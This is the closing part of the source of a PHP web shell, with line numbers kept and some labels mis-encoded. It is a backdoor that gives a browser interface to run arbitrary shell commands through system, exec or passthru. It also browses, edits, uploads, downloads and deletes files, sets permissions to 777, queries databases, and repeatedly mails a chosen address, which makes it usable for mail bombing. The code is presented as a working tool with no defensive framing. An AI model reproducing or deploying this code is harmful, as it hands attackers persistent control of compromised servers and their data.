1112gzclose($fp);}
1113header("Content-Disposition: attachment; filename=" . $file);
1114header("Content-Type: application/download");
1115header("Content-Length: " . filesize($file));
1116flush();
1117
1118$fp = fopen($file, "r");
1119while (!feof($fp))
1120{
1121 echo fread($fp, 65536);
1122 flush();
1123}
1124fclose($fp);
1125}
1126
1127if ($_GET['do']=="mail"){
1128echo $head.'
1129<form method=post action="'.$me.'">
1130<p align="center">
1131Address : <input type="text" name="admail" size="50"><br><br>Subject : <input type="text" name="submail" size="50"><br><br><textarea cols=70 rows=18 name=textmail>Text</textarea><br><br>Number For Send : <input type="text" name="numail" size="5" value=1><input type=submit value=Send!></form>'.$end;exit;}
1132if ($_POST['admail'] && $_POST['submail'] ){
1133for($mi=0;$mi<intval($_POST['numail']);$mi++){
1134mail($_POST['admail'], $_POST['submail'], $_POST['textmail']);}
1135}
1136if($_GET['do']=="db"){
1137echo $head;sqlclienT();echo $end;
1138exit;
1139}
1140if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
1141$chmodnum2=$_REQUEST['chmodnow'];
1142chmod($_REQUEST['file2ch'],"0".$chmodnum2);
1143}
1144if($_GET['do']=="chmod"){
1145echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;
1146
1147}
1148/* if($_GET['do']=="edit"){
1149if($_GET['filename']=="dir"){
1150if(is_readable($_GET['address'])){
1151chdir($_GET['address']);}else{alert("Permission Denied !");}
1152
1153}} */
1154$araddresss=explode($slash,getcwd());
1155$matharrayy=count($araddresss)-1;
1156$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
1157for($countback=0;$countback<count($addr1backk);$countback++){
1158$arraybacke[$countback]=$slash.$addr1backk[$countback];
1159$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
1160}
1161if ($slash=="\\"){
1162$countback=null;
1163$backdirwin=null;
1164for($countback=1;$countback<count($addr1backk);$countback++){
1165$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
1166$backdirwin=$addr1backk[0].$backdirwin;
1167$backaddresss=$backdirwin;
1168}else{
1169$countback=null;
1170$backdirwin=null;
1171for($countback=1;$countback<count($addr1backk);$countback++){
1172$backdirwin=$backdirwin."/".$addr1backk[$countback];}
1173$backdirwin=$addr1backk[0].$backdirwin;
1174$backaddresss=$backdirwin;
1175$backaddresss=str_replace("\\","/",$backaddresss);
1176}
1177function calc_dir_size($path)
1178{
1179$size = 0;
1180if ($handle = opendir($path))
1181{
1182while (false !== ($entry = readdir($handle)))
1183{
1184$current_path = $path . '/' . $entry;
1185if ($entry != '.' && $entry != '..' && !is_link($current_path))
1186{
1187if (is_file($current_path))
1188$size += filesize($current_path);
1189elseif (is_dir($current_path))
1190$size = calc_dir_size($current_path);
1191}
1192}
1193}
1194closedir($handle);
1195return $size;
1196}
1197function openf($parsef){
1198global $basep,$slash;
1199
1200if(strlen(strpos(getcwd(),$basep))>=1){
1201$rr=str_replace($basep,"",getcwd());
1202$rr=str_replace("\\","/",$rr);
1203$diropen='<a href="'.$rr."/".$parsef.'">'.$parsef.'</a>';
1204}else{
1205$diropen='<a href="?do=edit&address='.getcwd().$slash.'&filename='.$parsef.'">'.$parsef.'</a>';
1206}
1207return $diropen;
1208}
1209if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
1210if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
1211$ad=getcwd();
1212$hand=opendir("$ad");
1213$coi=0;
1214$coi2=0;
1215
1216while (false !== ($fileee = readdir($hand))) {
1217
1218
1219 if ($fileee != "." && $fileee != "..") {
1220 if (filetype($fileee)=="dir"){
1221 if ($coi %2){
1222$colort='"#e7e3de"';
1223}else{
1224$colort='"#e4e1de"';
1225
1226}
1227$coi++;
1228$fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="1" dir="ltr">
1229<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picdir. '" /> <a href="?address='.$cwd.$slash.$fileee.$slash.'">'.$fileee.'</b></span></td>
1230<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=dir&address='.$cwd.$slash.'&dirname='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
1231<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
1232;}
1233else{
1234
1235 if ($coi2 %2){
1236$colort='"#e7e3de"';
1237}else{
1238$colort='"#e4e1de"';
1239}
1240
1241$coi2++;
1242$file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
1243<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picfile. '" /> '.openf($fileee).'</span></td>
1244<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="23"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
1245<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
1246;}
1247}
1248}
1249echo $head.'
1250<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
1251<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
1252</tr></table>'.$fil.$file.'</table>
1253<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">
1254<tr>
1255<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1256<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'����ִ�� : </font></td>
1257<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input type=hidden name=address value='.getcwd().'><input name=command value=id size=50><input type=hidden name=do value=cmd size=50> <select name=execmethod>
1258 <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option>
1259</select> <input type=submit value="Execute"></form></td></tr>
1260<tr>
1261<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1262<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Dir : </font></td>
1263<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().$slash.' size=50>
1264<input type=submit value=Change></form></td></tr>
1265<tr>
1266<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1267<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create Dir : </font></td>
1268<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cdirname value='.getcwd().$slash.' size=50><input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
1269<tr>
1270<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1271<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create File : </font></td>
1272<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cfilename value='.getcwd().$slash.' size=50> <input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
1273<tr></form>
1274<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1275<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Upload : </font></td>
1276<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
1277<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > <input type=hidden name=address value='.getcwd().'>
1278<input type=submit value=Upload /></form></td></tr>
1279<tr>
1280<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1281<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Copy File : </font></td>
1282<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input size=20 name=copyname><input type=hidden name=address value="'.getcwd().'"> To <input size=40 name=cpyto value="'.getcwd().$slash.'"> <input type=submit value =Copy></form></td></tr>
1283'.$end;
1284?>